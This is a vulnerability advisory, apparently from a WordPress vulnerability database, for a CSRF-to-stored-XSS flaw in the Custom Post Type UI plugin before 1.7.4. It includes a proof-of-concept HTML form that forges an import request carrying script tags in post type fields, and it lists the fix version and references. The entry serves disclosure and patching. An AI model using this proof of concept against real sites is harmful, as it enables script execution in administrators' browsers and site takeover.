WordPress Plugin Vulnerabilities

Custom Post Type UI < 1.7.4 - CSRF to Stored XSS

Description

The Custom Post Type UI WordPress plugin was vulnerable to Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) within the "Import Post Types" functionality in the "Tools" tab. This functionality allows users to import "Post Types" from other websites, or from backup, as JSON. This could allow an attacker to execute arbitrary JavaScript in a victim's browser, if the attacker could entice the authenticated victim to visit a page they controlled. If successfully exploited, this vulnerability could lead to full site compromise.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jetpack.local/wp-admin/admin.php?page=cptui_tools" method="POST">
      <input type="hidden" name="cptui_post_import" value="{"slug":{"name":"<script>alert(1)<\/script>","label":"<script>alert(1)<\/script>","singular_label":"<script>alert(1)<\/script>","description":"<script>alert(1)<\/script>","public":"true","publicly_queryable":"true","show_ui":"true","show_in_nav_menus":"true","delete_with_user":"false","show_in_rest":"true","rest_base":"","rest_controller_class":"","has_archive":"false","has_archive_string":"","exclude_from_search":"false","capability_type":"post","hierarchical":"false","rewrite":"true","rewrite_slug":"","rewrite_withfront":"true","query_var":"true","query_var_slug":"","menu_position":"","show_in_menu":"true","show_in_menu_string":"","menu_icon":"","supports":["title","editor","thumbnail"],"taxonomies":[],"labels":{"menu_name":"","all_items":"","add_new":"","add_new_item":"","edit_item":"","new_item":"","view_item":"","view_items":"","search_items":"","not_found":"","not_found_in_trash":"","parent_item_colon":"","featured_image":"","set_featured_image":"","remove_featured_image":"","use_featured_image":"","archives":"","insert_into_item":"","uploaded_to_this_item":"","filter_items_list":"","items_list_navigation":"","items_list":"","attributes":"","name_admin_bar":"","item_published":"","item_published_privately":"","item_reverted_to_draft":"","item_scheduled":"","item_updated":""},"custom_supports":""}}" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
custom-post-type-ui
Fixed in 1.7.4

References

URL
https://plugins.trac.wordpress.org/changeset/2263231/custom-post-type-ui

Miscellaneous

Verified
No
WPVDB ID
dd31b70f-4af1-440b-aa0f-30d85a09cea3

Timeline

Publicly Published
2020-03-17 (about 3 years ago)
Added
2020-03-20 (about 3 years ago)
Last Updated
2020-03-23 (about 3 years ago)

Other

Published
Title
Published
2015-05-02
Title
Ad Inserter 1.5.2 - CSRF & XSS
Published
2019-06-10
Title
Online Lesson Booking <= 0.8.6 - CSRF & XSS
Published
2016-09-27
Title
Google Document Embedder < 2.6.2 - CSRF & XSS
Published
2015-02-28
Title
CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
Published
2019-06-08
Title
Breadcrumbs by menu <= 1.0.1 - Multiple Issues